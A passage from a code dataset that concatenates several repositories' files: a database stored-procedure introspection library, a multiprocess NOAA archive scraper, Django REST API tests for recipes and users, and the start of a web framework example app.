from dbsg.lib.configuration import FQDN
from dbsg.lib.introspection import (
COMPLEX_TYPES,
IntrospectionRow,
Introspection,
)
# **********************INTERMEDIATE REPRESENTATION TYPES**********************
Argument = Union['SimpleArgument', 'ComplexArgument']
# TODO: make generic arguments helper mixin
@dataclass
class SimpleArgument: # Flat
"""IR Argument superclass."""
name: str
position: int
sequence: int
data_level: int
data_type: str
custom_type_schema: Optional[str]
custom_type_package: Optional[str]
custom_type: Optional[str]
defaulted: bool
default_value: None # Always NULL, even if it's defaulted
in_out: str
@classmethod
def from_row(cls, row: IntrospectionRow):
"""Make IR argument type from an Introspection Row."""
return cls(
name=row.argument,
position=row.position,
sequence=row.sequence,
data_level=row.data_level,
data_type=row.data_type,
custom_type_schema=row.custom_type_schema,
custom_type_package=row.custom_type_package,
custom_type=row.custom_type,
defaulted=row.defaulted,
default_value=row.default_value,
in_out=row.in_out,
)
@property
def custom_type_fqdn(self): # FIXME: place into the CompleArgument?
"""Make fqdn for complex custom types."""
return '.'.join(
i for i in (
self.custom_type_schema,
self.custom_type_package,
self.custom_type,
)
if i
)
@dataclass
class ComplexArgument(SimpleArgument): # with Nested Arguments
"""IR Complex argument extension."""
arguments: MutableSequence[Argument] = field(default_factory=list)
@property
def direct_child_data_level(self):
"""If ComplexArgument has lvl == 2, its arguments have lvl == 3."""
return self.data_level + 1
@property
def complex_child(self) -> ComplexArgument:
"""Last argument shortcut."""
if isinstance(self.arguments[-1], ComplexArgument):
return self.arguments[-1]
raise TypeError('There is no complex children.')
@property
def simple_child(self) -> SimpleArgument:
"""Last simple argument shortcut."""
if isinstance(self.arguments[-1], SimpleArgument):
return self.arguments[-1]
raise TypeError('There is no simple children.')
@property
def last_child(self) -> Argument:
"""Last argument shortcut."""
return self.arguments[-1]
def dispatch_argument(self, argument: Argument):
"""Dispatch an argument into appropriate data level."""
# NOTE: Data Level == 0 is handled at the Routine level
# NOTE: Data Level < direct_child_data_level is handled by Parents
# Child that should be lifted into desired Data Level
if argument.data_level > self.direct_child_data_level:
# In this context, last_argument is always a ComplexArgument
self.complex_child.dispatch_argument(argument)
# Direct Child that should be placed at the Top
else:
self.arguments.append(argument)
@dataclass
class Routine:
"""IR routine type."""
name: str
type: str
object_id: int
overload: Optional[int]
subprogram_id: int
fqdn: FQDN = field(init=False) # Set manually or in from_row
arguments: MutableSequence[Argument] = field(default_factory=list)
@classmethod
def from_row(cls, row: IntrospectionRow) -> Routine:
"""Make IR routine type from IntrospectionRow factory."""
routine = cls(
name=row.routine,
type=row.routine_type,
object_id=row.object_id,
overload=row.overload,
subprogram_id=row.subprogram_id,
)
routine.fqdn = FQDN( # noqa: WPS601
row.schema,
row.package if row.is_package else '',
row.routine,
)
return routine
@property
def complex_child(self) -> ComplexArgument:
"""Last complex argument shortcut."""
if isinstance(self.arguments[-1], ComplexArgument):
return self.arguments[-1]
raise TypeError('There is no complex children.')
@property
def simple_child(self) -> SimpleArgument:
"""Last simple argument shortcut."""
if isinstance(self.arguments[-1], SimpleArgument):
return self.arguments[-1]
raise TypeError('There is no simple children.')
@property
def last_child(self) -> Argument:
"""Last argument shortcut."""
return self.arguments[-1]
def dispatch_argument(self, argument: Argument):
"""Dispatch an argument into appropriate data level."""
# Data Level == 0 should be placed at the Top
if argument.data_level == 0:
self.arguments.append(argument)
# Data Level > 0 is a guarantee that the Arg should be nested
else:
# In this context, last_argument is always a ComplexArgument
self.complex_child.dispatch_argument(argument)
@property
def sorted_arguments(self) -> MutableSequence[Argument]:
"""Sort argument, placing default one to the end."""
return sorted(self.arguments, key=lambda a: a.defaulted)
@property
def has_ins(self):
"""Check for IN or IN/OUT arguments."""
return any(a for a in self.arguments if a.in_out != 'out')
@dataclass
class Package:
"""IR package type."""
name: str
is_package: bool
routines: MutableSequence[Routine] = field(default_factory=list)
@dataclass
class Schema:
"""IR Schema type."""
name: str
packages: MutableSequence[Package] = field(default_factory=list)
@dataclass
class Database:
"""IR DB type."""
name: str
schemes: MutableSequence[Schema] = field(default_factory=list)
def __post_init__(self):
"""Lowercase the name for consistency."""
self.name = self.name.lower()
def dispatch_routine(self, row: IntrospectionRow, routine: Routine):
"""Dispatch the Routine into appropriate <schema.package>."""
if self.schemes and row.schema == self.schemes[-1].name:
schema = self.schemes[-1]
else:
schema = Schema(name=row.schema)
self.schemes.append(schema)
if schema.packages and row.package == schema.packages[-1].name:
package = schema.packages[-1]
else:
package = Package(name=row.package, is_package=row.is_package)
schema.packages.append(package)
package.routines.append(routine)
IR = MutableSequence[Database]
# **********************INTERMEDIATE REPRESENTATION TYPES**********************
class Abstract:
"""Intermediate Representation Factory."""
def __init__(self, introspection: Introspection):
"""Initialize IR with Introspection."""
self.introspection = introspection
def intermediate_representation(self) -> IR:
"""Parse introspection and make intermediate representation."""
intermediate_representation = []
for introspected in self.introspection:
database = Database(name=introspected.name)
routine: Optional[Routine] = None # None before first iteration
oid = None
sid = None
# Can be multi-threaded/processed later
for schema in introspected.schemes:
for row in schema.rows:
if row.data_type not in COMPLEX_TYPES:
argument = SimpleArgument.from_row(row)
else:
argument = ComplexArgument.from_row(row)
# The Sentinels:
# subprogram_id is unique for non-package routines
# object_id is unique for package routines
if oid != row.object_id or sid != row.subprogram_id:
routine = Routine.from_row(row)
database.dispatch_routine(row, routine)
# An excessive check for mypy validation
if routine is not None:
routine.dispatch_argument(argument)
oid = row.object_id
sid = row.subprogram_id
intermediate_representation.append(database)
return intermediate_representation
```
#### File: dbsg/lib/plugin.py
```python
from __future__ import annotations
from abc import ABCMeta, abstractmethod
from logging import getLogger
from importlib import import_module
from typing import Iterator, MutableMapping
from dbsg.lib.configuration import Configuration
from dbsg.lib.introspection import Introspection
from dbsg.lib.intermediate_representation import IR
LOG = getLogger(__name__)
# WPS407 Found mutable module constant. It makes sense here.
REGISTRY: MutableMapping[str, PluginMetaABC] = {} # noqa: WPS407
class PluginMetaABC(ABCMeta):
"""
Plugin Metaclass.
Registers plugins for later aliasing.
"""
# N804 first argument of a classmethod should be named 'cls'
def __new__(mcs, name, bases, namespace, **kwargs): # noqa: N804
"""Register all the unregistered plugins."""
new = super().__new__(PluginMetaABC, name, bases, namespace, **kwargs)
if not bases:
return new
if new.name() in REGISTRY:
LOG.info(
f'Skipping {name} ({new.name()}) registration. '
+ 'A plugin with the same name is already in '
+ f'REGISTRY: {REGISTRY[new.name()]}.',
)
else:
REGISTRY[new.name()] = new
return new
class PluginABC(metaclass=PluginMetaABC):
"""Plugin Interface."""
configuration: Configuration = NotImplemented
introspection: Introspection = NotImplemented
ir: IR = NotImplemented
@abstractmethod
def save(self, **kwargs):
"""Implement Plugin's logic."""
@classmethod
@abstractmethod
def name(cls):
"""Return verbose name."""
class Handler:
"""Default Plugin Handler."""
def __init__(
self,
configuration: Configuration,
introspection: Introspection,
ir: IR,
):
"""Initialize Plugin Handler, preloading all the standard plugins."""
# Preload all the standard plugins
import_module('dbsg.plugins')
self.configuration = configuration
self.introspection = introspection
self.ir = ir
def __iter__(self) -> Iterator[PluginABC]:
"""
Iterate over all the registered plugins.
Log all the unregistered ones.
"""
for name in self.configuration.plugins:
if name not in REGISTRY:
LOG.error(
f'The "{name}" plugin is not registered. Use '
+ f'{__name__}.PluginABC and your plugin will be '
+ 'registered automatically, or write a custom handler.',
)
continue
plugin: PluginABC = REGISTRY[name](
self.configuration,
self.introspection,
self.ir,
)
yield plugin
```
#### File: dbsg/plugins/json_plugin.py
```python
from dataclasses import asdict
from json import dumps
from dbsg.lib.plugin import PluginABC
REGISTRY_NAME = 'json'
class Plugin(PluginABC):
"""JSON plugin."""
def __init__(self, configuration, introspection, ir, **kwargs):
"""Initialize JSON plugin."""
self.configuration = configuration
self.introspection = introspection
self.ir = ir
self.kwargs = kwargs or {
'ensure_ascii': False,
'indent': 4,
}
@classmethod
def name(cls):
"""Alias in REGISTRY."""
return REGISTRY_NAME
def save(self, **kwargs):
"""Save JSON representation into an appropriate file."""
kwargs = kwargs or self.kwargs
path = self.configuration.path.absolute()
path.mkdir(parents=True, exist_ok=True)
for db in self.ir:
data = dumps({db.name: asdict(db)}, **kwargs)
(path / db.name).mkdir(exist_ok=True)
file = path / db.name / f'{db.name}.json'
with file.open('w', encoding='utf8') as fh:
fh.write(str(data))
JSONPlugin = Plugin # for direct imports
```
#### File: dbsg/tests/test_intermediate_representation.py
```python
from pytest import main
from dbsg.lib import configuration, introspection, intermediate_representation
def test_ir(dbsg_config_with_mocked_session: configuration.Configuration):
ir = intermediate_representation.Abstract(
introspection.Inspect(dbsg_config_with_mocked_session).introspection()
).intermediate_representation()
assert ir
def test_database(dbsg_config_with_mocked_session: configuration.Configuration):
ir = intermediate_representation.Abstract(
introspection.Inspect(dbsg_config_with_mocked_session).introspection()
).intermediate_representation()
db = ir[0]
assert db.name == 'db_name'
schema = db.schemes[0]
assert schema.name == 'bills'
package = schema.packages[0]
assert package.name == 'bill_utils_pkg'
routine = package.routines[0]
assert routine.name == 'payroll'
assert routine.type == 'procedure'
assert routine.object_id == 180000
assert str(routine.fqdn) == 'BILLS.BILL_UTILS_PKG.PAYROLL'
assert routine.has_ins
arg = routine.last_child
assert arg.name == 'out_payroll_id'
assert arg.in_out == 'out'
assert arg.data_type == 'number'
if __name__ == '__main__':
main(['-s', '-c', 'setup_tox.ini'])
``` |
{
"source": "jjj4x/noaa_scrapper",
"score": 2
} |
#### File: jjj4x/noaa_scrapper/noaa_scrapper.py
```python
from argparse import ArgumentParser
from dataclasses import asdict, dataclass, field
from io import BytesIO
from gzip import open as gzip_open
from logging import config as logging_config, getLogger
from multiprocessing import Process, Queue
from os import path as os_path, remove
from pathlib import Path
from queue import Empty, Full
from re import findall, match
from typing import Tuple
from tarfile import open as tar_open
from typing import Dict, List, Optional
from time import monotonic, sleep
from requests import get
SELF_PATH = Path(__file__)
DEFAULT_YEARS = ['1901', '1902']
LOG = getLogger(__name__)
LOG_CONF = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'root': {
'format': (
'SCRAP_NOAA[%(process)d] '
+ '[%(levelname)s] '
+ '[%(name)s] '
+ '%(message)s '
),
'datefmt': '%Y-%m-%dT%H:%M:%S',
'class': 'logging.Formatter',
},
},
'handlers': {
'stream': {
'class': 'logging.StreamHandler',
'formatter': 'root',
'stream': 'ext://sys.stderr',
},
},
'root': {
'handlers': ['stream'],
'level': 'INFO',
},
}
@dataclass
class Config:
# *********************************Defaults*********************************
DEFAULT_URL = 'https://www.ncei.noaa.gov/data/global-hourly/archive/isd/'
DEFAULT_INDEX_REGEX = r'>(isd_\d{4}_c.*.tar.gz)<'
DEFAULT_MEMBER_REGEX = r'\d+-\d+-\d+'
DEFAULT_RUN_TIME_MAX = 300 # 5 minutes
DEFAULT_WORKERS_COUNT = 2
DEFAULT_POLLING_TIMEOUT = 2
DEFAULT_TERMINATE_TIMEOUT = 2.
DEFAULT_TMP_DIR = Path('/tmp/noaa_stuff')
# **************************************************************************
# *********************************Options*********************************
logging: Dict = field(default_factory=lambda: LOG_CONF)
url: str = field(default=DEFAULT_URL)
index_regex: str = field(default=DEFAULT_INDEX_REGEX)
member_regex: str = field(default=DEFAULT_MEMBER_REGEX)
run_time_max: int = field(default=DEFAULT_RUN_TIME_MAX)
workers_count: int = field(default=DEFAULT_WORKERS_COUNT)
polling_timeout: float = field(default=DEFAULT_POLLING_TIMEOUT)
terminate_timeout: float = field(default=DEFAULT_TERMINATE_TIMEOUT)
years: List[set] = field(default_factory=lambda: DEFAULT_YEARS)
force: bool = field(default=False)
tmp_dir: Path = field(default=DEFAULT_TMP_DIR)
is_compress: bool = field(default=False)
# *************************************************************************
def as_dict(self):
return asdict(self)
@classmethod
def normalize_years(cls, inp: str):
years = inp.split(',') if ',' in inp else inp.split('-')
if '-' in inp:
years = range(int(years[0]), int(years[1]) + 1)
return sorted(str(y) for y in years)
@classmethod
def normalize_url(cls, inp: str):
return inp.rstrip('/') + '/'
@classmethod
def configure(cls, cli=None) -> 'Config':
args = (cli or CLI).parse_args().__dict__ or {}
return cls.activate_logging(Config(**args))
@classmethod
def activate_logging(cls, config: 'Config') -> 'Config':
"""
Activate global logging settings.
:param config: the conf
:return: the same conf
"""
log = config.logging
logging_config.dictConfig(log)
root_level = log['root']['level']
root_handlers = ', '.join(log['root']['handlers'])
LOG.info(f'The Root Logger [{root_level}] handlers: {root_handlers}')
return config
CLI = ArgumentParser()
CLI.add_argument(
'--url',
dest='url',
default=Config.DEFAULT_URL,
type=Config.normalize_url,
)
CLI.add_argument(
'--index-regex',
dest='index_regex',
default=Config.DEFAULT_INDEX_REGEX,
)
CLI.add_argument(
'--member-regex',
dest='member_regex',
default=Config.DEFAULT_MEMBER_REGEX,
)
CLI.add_argument(
'--run-time-max',
dest='run_time_max',
default=Config.DEFAULT_RUN_TIME_MAX,
type=int,
)
CLI.add_argument(
'--workers-count',
dest='workers_count',
default=Config.DEFAULT_WORKERS_COUNT,
type=int,
)
CLI.add_argument(
'--polling-timeout',
dest='polling_timeout',
default=Config.DEFAULT_POLLING_TIMEOUT,
type=float,
)
CLI.add_argument(
'--terminate_timeout',
dest='terminate_timeout',
default=Config.DEFAULT_TERMINATE_TIMEOUT,
type=float,
)
CLI.add_argument(
'--years',
dest='years',
default=DEFAULT_YEARS,
type=Config.normalize_years,
help='For example: --years 1901; --years 1901,1902; --years 1901-1930',
)
CLI.add_argument(
'--force',
action='store_true',
dest='force',
default=False,
help='Force overwrite files if they already exist.',
)
# noinspection PyTypeChecker
CLI.add_argument(
'--tmp-dir',
dest='tmp_dir',
default=Config.DEFAULT_TMP_DIR.absolute(),
type=Path,
help='Directory for dumping temporary data (tarball extraction).',
)
CLI.add_argument(
'--is-compress',
action='store_true',
dest='is_compress',
default=False,
help='If set, the result will be gzipped in filename like "1901.gz". Else '
'it will be saved as plaintext into "1901".',
)
class Worker(Process):
def __init__(
self,
worker_number: int,
conf: Config,
queue: 'Queue[Tuple[str, str]]', # (year, filename)
queue_done: 'Queue[str]',
daemon=True,
**kwargs,
):
super().__init__(daemon=daemon, **kwargs)
self.worker_number = worker_number
self.conf = conf
self.queue = queue
self.queue_done = queue_done
def run(self):
"""Worker loop."""
while True:
try:
year, filename = self.queue.get(timeout=2, block=True)
except Empty:
continue
LOG.info('Fetching %s', self.conf.url + filename)
res = get(self.conf.url + filename, stream=True)
if not (200 <= res.status_code < 300):
LOG.warning('Cannot download %s for some reason', filename)
self.queue_done.put(year, block=False)
continue
result = f'./{year}.gz' if self.conf.is_compress else f'./{year}'
if os_path.isfile(result) and not self.conf.force:
LOG.info('The ./%s.txt is already exists', year)
self.queue_done.put(year, block=False)
continue
if os_path.isfile(result) and self.conf.force:
LOG.info('The ./%s.txt is already exists; removing', year)
remove(result)
tmp = self.conf.tmp_dir / year
tmp.mkdir(exist_ok=True, parents=True)
LOG.info('Dumping %s into %s', filename, tmp.absolute())
with tar_open(fileobj=BytesIO(res.raw.read()), mode='r:gz') as tar:
data = (m.name for m in tar.getmembers())
data = (m for m in data if match(self.conf.member_regex, m))
tar.extractall(tmp.absolute())
_open = gzip_open if self.conf.is_compress else open
with _open(result, 'ab') as fd_result:
for data_file in data:
LOG.info('Aggregating %s into %s', data_file, result)
with (tmp / data_file).open(mode='rb') as fd_data_file:
fd_result.write(fd_data_file.read())
self.queue_done.put(year, block=False)
class Master:
"""Master process and load balancer."""
def __init__(self, conf: Config):
workers = [None for _ in range(conf.workers_count)]
self.workers: List[Optional[Worker]] = workers
self.queue: 'Queue[Tuple[str, str]]' = Queue()
self.queue_done: 'Queue[str]' = Queue()
self.conf = conf
def start(self):
"""Master loop."""
res = get(self.conf.url)
if not (200 <= res.status_code < 300):
res.raise_for_status()
index = {}
for filename in findall(self.conf.index_regex, res.text):
# filename == 'isd_1901_c20180826T025524.tar.gz'
_, year, *_ = filename.split('_')
index[year] = filename
for number in range(self.conf.workers_count):
worker = Worker(number, self.conf, self.queue, self.queue_done)
worker.start()
self.workers[number] = worker
pending = {year for year in self.conf.years if year in index}
if not pending:
LOG.warning(
'Cannot fetch %s. The available years are: %s.',
self.conf.years,
index.values(),
)
raise RuntimeError('There is nothing to do.')
for year in pending:
try:
self.queue.put((year, index[year]), block=False)
except Full:
LOG.warning('Cannot add %s; the queue is full.', year)
continue
start = monotonic()
while pending:
if monotonic() - start > self.conf.run_time_max:
raise RuntimeError('There is some dangling work.')
if any(not w.is_alive() for w in self.workers):
raise RuntimeError('Some worker is dead :(.')
while not self.queue_done.empty():
pending.discard(self.queue_done.get(block=False))
LOG.info(f'Waiting for {pending}.',)
sleep(self.conf.polling_timeout)
LOG.info('All done')
def stop(self):
LOG.info('Shutting down master process.')
self.queue.close()
self.queue_done.close()
workers = [w for w in self.workers if w is not None]
LOG.info('Trying to terminate workers.')
for worker in workers:
if worker.is_alive():
worker.terminate()
sleep(self.conf.terminate_timeout)
if not any(p.is_alive() for p in workers):
return
LOG.warning('Some workers did not stop. Killing all the workers :(.')
for worker in workers:
if worker.is_alive():
worker.kill()
def main(conf=None):
master = Master(conf or Config.configure())
try:
master.start()
finally:
master.stop()
if __name__ == '__main__':
main()
``` |
{
"source": "jjj4x/recipe-app-api",
"score": 2
} |
#### File: recipe/tests/test_recipe_api.py
```python
from tempfile import NamedTemporaryFile
from os import path
from django.contrib.auth import get_user_model
from django.shortcuts import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from PIL import Image
from core.models import Recipe, Tag, Ingredient
from recipe.serializers import RecipeSerializer, RecipeDetailSerializer
def upload_image_url(recipe_id):
"""URL for image upload."""
return reverse('recipe:recipe-upload-image', args=[recipe_id])
def sample_tag(user, **params):
"""Create a sample tag."""
params.setdefault('name', 'Main course')
return Tag.objects.create(user=user, **params)
def sample_ingredient(user, **params):
"""Create a sample ingredient."""
params.setdefault('name', 'Cinnamon')
return Ingredient.objects.create(user=user, **params)
def sample_recipe(user, **params):
"""Create a sample user."""
params.setdefault('title', 'Sample Recipe')
params.setdefault('time_minutes', 10)
params.setdefault('price', 5.0)
return Recipe.objects.create(user=user, **params)
class PublicRecipeAPITests(TestCase):
"""Publicly available Recipe API."""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.client = APIClient()
def test_login_required(self):
"""Test that login is required for listing."""
res = self.client.get(reverse('recipe:recipe-list'))
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateRecipeAPITests(TestCase):
"""Private Recipe API."""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.user = get_user_model().objects.create_user(
email='<EMAIL>',
password='<PASSWORD>',
)
def setUp(self):
self.client = APIClient()
self.client.force_authenticate(self.user)
def test_retrieve_recipes(self):
"""Test recipes listing."""
sample_recipe(self.user)
sample_recipe(self.user)
res = self.client.get(reverse('recipe:recipe-list'))
self.assertEqual(res.status_code, status.HTTP_200_OK)
recipes = Recipe.objects.all().order_by('-id')
serializer = RecipeSerializer(recipes, many=True)
self.assertEqual(res.data, serializer.data)
def test_recipes_limited_to_user(self):
"""Test recipes are limited to own user."""
user2 = get_user_model().objects.create_user(
email='<EMAIL>',
password='<PASSWORD>',
)
sample_recipe(user2)
sample_recipe(self.user)
res = self.client.get(reverse('recipe:recipe-list'))
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
recipes = Recipe.objects.filter(user=self.user)
serializer = RecipeSerializer(recipes, many=True)
self.assertEqual(res.data, serializer.data)
def test_recipe_detail(self):
"""Test viewing recipe detail."""
recipe = sample_recipe(self.user)
recipe.tags.add(sample_tag(self.user))
recipe.ingredients.add(sample_ingredient(self.user))
url = reverse('recipe:recipe-detail', args=[recipe.id])
res = self.client.get(url)
self.assertEqual(res.status_code, status.HTTP_200_OK)
sr = RecipeDetailSerializer(recipe)
self.assertEqual(res.data, sr.data)
def test_create_basic_recipe(self):
"""Test creating basic recipe."""
payload = {
'title': 'Chocolate cheesecake',
'time_minutes': 30,
'price': 5.0,
}
res = self.client.post(reverse('recipe:recipe-list'), payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
recipe = Recipe.objects.get(id=res.data['id'])
for key in payload:
self.assertEqual(getattr(recipe, key), payload[key])
def test_tag_assignment(self):
"""Test creating recipe with tags."""
tag1 = sample_tag(self.user, name='Vegan')
tag2 = sample_tag(self.user, name='Dessert')
payload = {
'title': 'Avocado Lime Cheesecake',
'tags': [tag1.id, tag2.id],
'time_minutes': 60,
'price': 20.0,
}
res = self.client.post(reverse('recipe:recipe-list'), payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
recipe = Recipe.objects.get(id=res.data['id'])
tags = recipe.tags.all()
self.assertEqual(tags.count(), 2)
self.assertIn(tag1, tags)
self.assertIn(tag2, tags)
def test_ingredient_assignment(self):
"""Test creating recipe with ingredients."""
ing1 = sample_ingredient(self.user, name='Prawns')
ing2 = sample_ingredient(self.user, name='Ginger')
payload = {
'title': 'Thai prawn red carry',
'ingredients': [ing1.id, ing2.id],
'time_minutes': 20,
'price': 7.0,
}
res = self.client.post(reverse('recipe:recipe-list'), payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
recipe = Recipe.objects.get(id=res.data['id'])
ings = recipe.ingredients.all()
self.assertEqual(ings.count(), 2)
self.assertIn(ing1, ings)
self.assertIn(ing2, ings)
def test_partial_update_recipe(self):
"""Patching a recipe."""
recipe = sample_recipe(self.user)
recipe.tags.add(sample_tag(self.user))
tag = sample_tag(self.user, name='Curry')
payload = {
'title': 'Chicken tikka',
'tags': [tag.id],
}
url = reverse('recipe:recipe-detail', args=[recipe.id])
self.client.patch(url, payload)
recipe.refresh_from_db()
self.assertEqual(recipe.title, payload['title'])
tags = recipe.tags.all()
self.assertEqual(len(tags), 1)
self.assertIn(tag, tags)
def test_full_update_recipe(self):
"""Putting a recipe (replace)."""
recipe = sample_recipe(self.user)
recipe.tags.add(sample_tag(self.user))
payload = {
'title': 'Spaghetti carbonara',
'time_minutes': 25,
'price': 5.0,
}
url = reverse('recipe:recipe-detail', args=[recipe.id])
self.client.put(url, payload)
recipe.refresh_from_db()
self.assertEqual(recipe.title, payload['title'])
self.assertEqual(recipe.time_minutes, payload['time_minutes'])
self.assertEqual(recipe.price, payload['price'])
tags = recipe.tags.all()
self.assertEqual(len(tags), 0)
def test_filter_recipes_by_tags(self):
"""Test filtering by tags."""
recipe1 = sample_recipe(self.user, title='Thai vegetable curry')
recipe2 = sample_recipe(self.user, title='Aubergine with tahini')
recipe3 = sample_recipe(self.user, title='Fish and chips')
tag1 = sample_tag(self.user, name='Vegan')
tag2 = sample_tag(self.user, name='Vegetarian')
recipe1.tags.add(tag1)
recipe2.tags.add(tag2)
res = self.client.get(
reverse('recipe:recipe-list'),
{'tags': f'{tag1.id},{tag2.id}'},
)
ser1 = RecipeSerializer(recipe1)
ser2 = RecipeSerializer(recipe2)
ser3 = RecipeSerializer(recipe3)
self.assertIn(ser1.data, res.data)
self.assertIn(ser2.data, res.data)
self.assertNotIn(ser3.data, res.data)
def test_filter_recipes_by_ingredients(self):
"""Test filtering by ingredients."""
recipe1 = sample_recipe(self.user, title='Posh beans on toast')
recipe2 = sample_recipe(self.user, title='Chicken cacciatore')
recipe3 = sample_recipe(self.user, title='Steak and mushrooms')
ing1 = sample_ingredient(self.user, name='Feta cheese')
ing2 = sample_ingredient(self.user, name='Chicken')
recipe1.ingredients.add(ing1)
recipe2.ingredients.add(ing2)
res = self.client.get(
reverse('recipe:recipe-list'),
{'ingredients': f'{ing1.id},{ing2.id}'},
)
ser1 = RecipeSerializer(recipe1)
ser2 = RecipeSerializer(recipe2)
ser3 = RecipeSerializer(recipe3)
self.assertIn(ser1.data, res.data)
self.assertIn(ser2.data, res.data)
self.assertNotIn(ser3.data, res.data)
class RecipeUploadImageTests(TestCase):
"""Test image uploads."""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.user = get_user_model().objects.create_user(
email='<EMAIL>',
password='<PASSWORD>',
)
def setUp(self):
self.client = APIClient()
self.client.force_authenticate(self.user)
self.recipe = sample_recipe(user=self.user)
def tearDown(self):
self.recipe.image.delete()
def test_upload_image(self):
"""Test uploading an image."""
url = upload_image_url(self.recipe.id)
with NamedTemporaryFile(suffix='.jpg') as tf:
img = Image.new('RGB', (10, 10))
img.save(tf, format='JPEG')
tf.seek(0)
res = self.client.post(url, {'image': tf}, format='multipart')
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.recipe.refresh_from_db()
self.assertIn('image', res.data)
self.assertTrue(path.exists(self.recipe.image.path))
def test_upload_image_invalid(self):
"""Test uploading invalid image."""
url = upload_image_url(self.recipe.id)
res = self.client.post(url, {'image': 'not image'}, format='multipart')
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
```
#### File: user/tests/test_user_api.py
```python
from django.contrib.auth import get_user_model
from django.test import TestCase
from django.shortcuts import reverse
from rest_framework.test import APIClient
from rest_framework import status
def create_user(**param):
"""Create user."""
return get_user_model().objects.create_user(**param)
class PublicUserAPITests(TestCase):
"""Non-authenticated users."""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.client = APIClient()
def test_create_valid_user_success(self):
"""Test creating valid user."""
payload = {
'email': '<EMAIL>',
'password': '<PASSWORD>*',
'name': 'Guy',
}
res = self.client.post(reverse('user:create'), payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
user = get_user_model().objects.get(**res.data)
self.assertTrue(user.check_password(payload['password']))
self.assertNotIn('password', res.data)
def test_user_exists(self):
"""Test when he already exists."""
payload = {
'email': '<EMAIL>',
'password': '<PASSWORD>*',
'name': 'Guy',
}
create_user(**payload)
res = self.client.post(reverse('user:create'), payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_password_too_short(self):
"""Password should be more than 5 chars."""
payload = {
'email': '<EMAIL>',
'password': '12',
'name': 'Guy',
}
res = self.client.post(reverse('user:create'), payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
is_user = get_user_model().objects.filter(
email=payload['email'],
).exists()
self.assertFalse(is_user)
def test_create_token_for_user(self):
"""Test token creation for users."""
payload = {
'email': '<EMAIL>',
'password': '<PASSWORD>*',
'name': 'Guy',
}
create_user(**payload)
res = self.client.post(reverse('user:token'), payload)
self.assertIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_200_OK)
def test_create_token_invalid_credentials(self):
"""Test with invalid credentials."""
payload = {
'email': '<EMAIL>',
'password': '<PASSWORD>*',
'name': 'Guy',
}
create_user(**payload)
payload = {
'email': '<EMAIL>',
'password': '<PASSWORD>',
}
res = self.client.post(reverse('user:token'), payload)
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_token_no_user(self):
"""Test without user."""
payload = {
'email': '<EMAIL>',
'password': '<PASSWORD>*',
'name': 'Guy',
}
res = self.client.post(reverse('user:token'), payload)
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_token_missing_field(self):
"""Test email and password are required."""
payload = {
'email': 'admin',
'password': '',
'name': 'Guy',
}
res = self.client.post(reverse('user:token'), payload)
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_retrieve_user_unauthorized(self):
"""Test unauthorized user."""
res = self.client.get(reverse('user:me'))
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateAPITests(TestCase):
"""Test API requests that require authentication."""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.user = create_user(
email='<EMAIL>',
password='<PASSWORD>',
name='Maxim',
)
def setUp(self):
self.client = APIClient()
self.client.force_authenticate(self.user)
def test_retrieve_profile_success(self):
"""Test get profile for logged in user."""
res = self.client.get(reverse('user:me'))
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(
res.data,
{'name': self.user.name, 'email': self.user.email},
)
def test_post_profile_not_allowed(self):
"""Test POST is not allowed for profile."""
res = self.client.post(reverse('user:me'), {})
self.assertEqual(res.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_update_user_profile(self):
"""Test updating authenticated user."""
payload = {
'name': '<NAME>',
'password': '<PASSWORD>',
}
res = self.client.patch(reverse('user:me'), payload)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.user.refresh_from_db()
self.assertEqual(self.user.name, payload['name'])
self.assertTrue(self.user.check_password(payload['password']))
``` |
{
"source": "jjj999/bamboo",
"score": 2
} |
#### File: examples/tweets/app.py
```python
from dataclasses import dataclass
from datetime import datetime
import functools
import json
import traceback
import typing as t
from bamboo import (
ErrInfo,
HTTPStatus,
WSGIApp,
WSGIEndpoint,
WSGIServerForm,
WSGITestExecutor,
)
from bamboo.api import JsonApiData
from bamboo.request import Response, http
from bamboo.sticky.http import data_format
from peewee import (
BigAutoField,
CharField,
DateTimeField,
ForeignKeyField,
IntegrityError,
Model,
PostgresqlDatabase,
TextField,
)
# For the MVC architecture ------------------------------------------------------
db = PostgresqlDatabase("bamboo-tutorials")
class ModelBase(Model):
class Meta:
database = db
@classmethod
def get_fields(cls) -> t.Tuple[str]:
return tuple(cls._meta.fields.keys())
class ControllerBase:
def __init__(self, model: t.Type[ModelBase]) -> None:
self.model = model
if not model.table_exists():
model.create_table()
# --------------------------------------------------------------------------------
# Errors ----------------------------------------------------------------------
class CustomErrInfo(ErrInfo):
msg: str
def get_body(self) -> t.Union[bytes, t.Iterable[bytes]]:
return self.msg.encode()
class InternalErrInfo(ErrInfo):
http_status = HTTPStatus.INTERNAL_SERVER_ERROR
msg = "Some errors occured in the server."
def __init__(self, *args: object) -> None:
super().__init__(*args)
traceback.print_exc()
# User
class UserAlreadyExistErrInfo(ErrInfo):
